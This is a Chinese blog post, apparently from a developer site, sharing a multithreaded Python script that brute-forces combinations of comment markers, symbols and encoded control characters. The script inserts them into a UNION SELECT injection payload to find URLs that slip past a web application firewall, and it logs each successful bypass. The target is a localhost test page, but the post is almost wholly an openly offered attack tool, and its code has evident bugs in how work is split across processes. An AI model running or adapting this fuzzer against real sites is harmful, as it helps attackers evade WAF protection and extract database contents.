多线程FUZZ WAF的python脚本

#!/usr/bin/python
#coding:utf-8

'''
        学习了Va1n3R的注入绕过思路,自己也学习一下fuzz脚本的编写
        规则库还是使用Va1n3R的
        fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
        fuzz_sz = ['',' ']
        fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
        By T00ls.Net
'''

import sys,requests,time,threading,random
from multiprocessing import Process,Queue


fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
fuzz = fuzz_zs+fuzz_sz+fuzz_ch

headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
i=0
glen = len(fuzz)**6

lock = threading.Lock()

def generator():
        
        for a in fuzz:
                for b in fuzz:
                        for c in fuzz:
                                for d in fuzz:
                                        for e in fuzz:
                                                for f in fuzz:
                                                        st = a+b+c+d+e+f
                                                        yield st
g = generator()
'''
def geti():
        global i
        i+=1
        return i
'''
def task(q,l):
        for x in range(l):
                i = int(q.get())
                i+=1
                q.put(i)
                lock.acquire()
                st=g.__next__()
                try:
                        url = "http://127.0.0.1/fuzz/index.php?id=1"
                        url = url+" /*!union"+st+"select*/ 1,2,3"
                        sys.stdout.write(' '*30 + '\r')
                        #sys.stdout.flush()
                        print("[-] new URL: %s"%url)
                        sys.stdout.write("正在测试:%d/%d"%(i,glen))
                        sys.stdout.write(' '*30 + '\r')
                        sys.stdout.flush()
                finally:
                        lock.release()
                try:
                        res = requests.get(url,headers=headers)
                        if '<td>id</td>' in res.text:
                                lock.acquire()
                                try:
                                        sys.stdout.write("[+] Find Bypass URL: %s\n"%url)
                                        with open('./apache_p.txt','a+') as f:
                                                f.write(url+'\n')
                                finally:
                                        lock.release()
                except:pass
                time.sleep(random.random())
def main():
        q = Queue()
        g = generator()
        process_num=100
        global glen
        #将g分组
        print("正在为list分组....")
        # l 表示每个组的元素个数
        l = glen/process_num
        #创建线程并为线程分配list
        q.put(1)
        for j in range(process_num):
                l = int(l)
                if j!=process_num:
                        p = Process(target=task,args=(q,l))
                else:
                        #为了保证生成器的元素全部使用
                        l =l + glen%process_num
                        p = Process(target=task,args=(q,l))
                p.start()

if __name__ == '__main__':
        main()

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值